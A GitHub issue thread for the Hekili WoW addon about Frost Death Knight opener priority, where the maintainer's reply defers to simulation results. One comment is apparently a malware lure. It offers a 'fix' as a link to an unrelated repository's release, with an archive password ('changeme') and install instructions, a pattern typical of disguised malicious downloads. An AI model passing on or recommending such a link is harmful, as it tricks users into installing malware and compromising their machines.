### ISSUE TITLE
Frost DK DW Obliteration Frost Strike priority

### ISSUE THREAD

**Issue by shawnzzzz** [Hekili/hekili#3582]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

The addon is recommending Frost strike before pillar of frost for DK opener, I'm a new DK player but it seems this goes against guides on Icyveins and wowhead

### How to Reproduce

on frost spec take deathbringer and the basic dual wield m+ talent build from wowhead

### Snapshot (Link)

https://pastebin.com/gSdibD42

### Raidbots Sim Report (Link)

https://www.raidbots.com/simbot/report/fCTwczndXivfV7UhD3sLg9

### Additional Information

The sim also suggests frost strike before pof in the opener so I'm not sure whats correct

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Hekili** [comment]
When the sims and guides disagree, we stick to the sims until/unless sims are provided that illustrate a DPS improvement from making a change.  You may want to follow-up with the simulationcraft project.
